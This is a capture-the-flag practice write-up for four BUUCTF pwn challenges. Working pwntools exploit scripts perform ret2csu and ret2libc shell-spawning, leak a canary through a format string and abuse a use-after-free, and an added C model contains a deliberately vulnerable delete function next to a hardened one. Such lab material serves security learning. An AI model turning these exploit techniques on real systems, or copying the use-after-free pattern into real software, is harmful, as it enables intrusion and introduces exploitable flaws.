PWN-PRACTICE-BUUCTF-10
- jarvisoj_level3_x64
- bjdctf_2020_babyrop2
- hitcontraining_uaf
- jarvisoj_test_your_memory
jarvisoj_level3_x64
Stack overflow in a 64-bit ELF, exploited with ret2csu (the __libc_csu_init gadgets) to leak a libc address and then return to system.
```python
from pwn import *

# context.log_level = 'debug'
# io = process('./jarvisoj_level3_x64')
io = remote('node4.buuoj.cn', 29473)
elf = ELF('./jarvisoj_level3_x64')
libc = ELF('./libc-2.23-x64.so')

# __libc_csu_init gadgets: part1 pops rbx/rbp/r12-r15, part2 loads rdx/rsi/edi and calls [r12+rbx*8]
part1 = 0x4006AA
part2 = 0x400690
write_plt = elf.plt['write']
write_got = elf.got['write']
read_got = elf.got['read']
main_addr = elf.sym['main']
pop_rdi = 0x4006b3


def com_gadget(part1, part2, jmp2, arg1=0x0, arg2=0x0, arg3=0x0):
    payload = p64(part1)   # part1 entry: pop rbx, rbp, r12, r13, r14, r15; ret
    payload += p64(0x0)    # rbx must be 0x0
    payload += p64(0x1)    # rbp must be 0x1
    payload += p64(jmp2)   # r12: address that part2 calls via [r12+rbx*8]
    payload += p64(arg3)   # r13 -> rdx (arg3)
    payload += p64(arg2)   # r14 -> rsi (arg2)
    payload += p64(arg1)   # r15d -> edi (arg1)
    payload += p64(part2)  # part2 entry: will call [r12+rbx*0x8]
    payload += b'A' * 56   # junk: 6*8+8 = 56 bytes consumed by the second pop sequence
    return payload


# Stage 1: write(1, read@got, 8) to leak the libc address of read, then return to main
io.recvuntil(b'Input:\n')
payload = b'a' * (0x80 + 8)
payload += com_gadget(part1, part2, write_got, 1, read_got, 8)
payload += p64(main_addr)
io.sendline(payload)
read_addr = u64(io.recv(6).ljust(8, b'\x00'))
print(hex(read_addr))

libc_base = read_addr - libc.sym['read']
system = libc_base + libc.sym['system']
binsh = libc_base + next(libc.search(b'/bin/sh\x00'))

# Stage 2: system("/bin/sh")
io.recvuntil(b'Input:\n')
payload = b'a' * (0x80 + 8) + p64(pop_rdi) + p64(binsh) + p64(system) + p64(main_addr)
io.sendline(payload)
io.interactive()
```

bjdctf_2020_babyrop2
A format string bug leaks the stack canary; with the canary known, the stack overflow is exploited with a standard ret2libc chain.
```python
from pwn import *

# context.log_level = 'debug'
# io = process('./bjdctf_2020_babyrop2')
io = remote('node4.buuoj.cn', 28650)
elf = ELF('./bjdctf_2020_babyrop2')
libc = ELF('./libc-2.23-x64.so')

puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
vuln_addr = elf.sym['vuln']
pop_rdi = 0x400993

# Leak the canary through the format string (7th stack argument)
io.recvuntil(b'help u!\n')
io.sendline(b'%7$lx')
canary = int(io.recvuntil(b'\n')[:-1], 16)
print(hex(canary))

# Stage 1: keep the canary intact, leak puts@got, return to vuln
io.recvuntil(b'story!\n')
payload = b'a' * (0x20 - 8) + p64(canary) + b'b' * 8
payload += p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(vuln_addr)
io.sendline(payload)
puts_addr = u64(io.recv(6).ljust(8, b'\x00'))
print(hex(puts_addr))

libc_base = puts_addr - libc.sym['puts']
system = libc_base + libc.sym['system']
binsh = libc_base + next(libc.search(b'/bin/sh\x00'))

# Stage 2: system("/bin/sh")
payload1 = b'a' * (0x20 - 8) + p64(canary) + b'b' * 8
payload1 += p64(pop_rdi) + p64(binsh) + p64(system) + p64(vuln_addr)
io.recvuntil(b'story!\n')
io.sendline(payload1)
io.interactive()
```

hitcontraining_uaf
Reference: [BUUCTF]PWN——hitcontraining_uaf
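As an added illustration that is not part of the original writeup, the use-after-free pattern this challenge turns on, modelled in C with the hardened delete beside the vulnerable one; the struct layout, the slot array and all function names are assumptions, not the challenge binary's code:

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed (hypothetical) hacknote-style layout: a function pointer, then a content pointer. */
typedef struct note {
    void (*print)(struct note *self);
    char *content;
} note_t;

#define MAX_NOTES 4
static note_t *notes[MAX_NOTES];

static void print_content(note_t *self) { puts(self->content); }

/* Allocate a note in slot idx: 0 on success, -1 on bad index, used slot or OOM. */
int add_note(int idx, size_t size, const char *content) {
    if (idx < 0 || idx >= MAX_NOTES || notes[idx] != NULL || size == 0) return -1;
    note_t *n = malloc(sizeof *n);
    if (n == NULL) return -1;
    n->content = malloc(size);
    if (n->content == NULL) { free(n); return -1; }
    n->print = print_content;
    strncpy(n->content, content, size - 1);
    n->content[size - 1] = '\0';
    notes[idx] = n;
    return 0;
}

/* Vulnerable pattern: both chunks are freed but notes[idx] keeps pointing at them,
 * so a later print_note would dereference freed memory (use-after-free). */
void delete_note_unsafe(int idx) {
    if (idx < 0 || idx >= MAX_NOTES || notes[idx] == NULL) return;
    free(notes[idx]->content); free(notes[idx]);
}

/* Hardened form: clear the slot, so later print/delete on it fail closed. */
void delete_note_safe(int idx) {
    if (idx < 0 || idx >= MAX_NOTES || notes[idx] == NULL) return;
    free(notes[idx]->content); free(notes[idx]);
    notes[idx] = NULL;
}

/* 0 if a live note was printed, -1 if the slot is empty. */
int print_note(int idx) {
    if (idx < 0 || idx >= MAX_NOTES || notes[idx] == NULL) return -1;
    notes[idx]->print(notes[idx]);
    return 0;
}

/* 1 if the slot still holds a pointer (it dangles after delete_note_unsafe). */
int slot_occupied(int idx) { return idx >= 0 && idx < MAX_NOTES && notes[idx] != NULL; }
```

After the unsafe delete the slot still looks occupied, which is exactly the state the exploit script below relies on when it reallocates an 8-byte chunk and prints note 0.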
```python
from pwn import *

io = remote('node4.buuoj.cn', 26666)
# io = process('./hacknote')
elf = ELF('./hacknote')


def add(size, content):
    io.sendlineafter(b'choice :', b'1')
    io.sendlineafter(b'Note size :', str(size))
    io.sendlineafter(b'Content :', content)


def delete(idx):
    io.sendlineafter(b'choice :', b'2')
    io.sendlineafter(b'Index :', str(idx))


def print_(idx):
    io.sendlineafter(b'choice :', b'3')
    io.sendlineafter(b'Index :', str(idx))


magic = 0x8048945  # value written into the reused 8-byte chunk (the freed note struct)

add(0x10, b'aaaa')
add(0x10, b'bbbb')
delete(0)
delete(1)
add(8, p32(magic))  # 8-byte content reuses the freed note struct of note 0
print_(0)           # note 0 is still referenced after free (use-after-free)
io.interactive()
```

jarvisoj_test_your_memory
The challenge gives the address of the string "cat flag".
The mem_test function contains a stack overflow.
Return to win_func with the address of the string "cat flag" as its argument, so that system("cat flag") runs and prints the flag.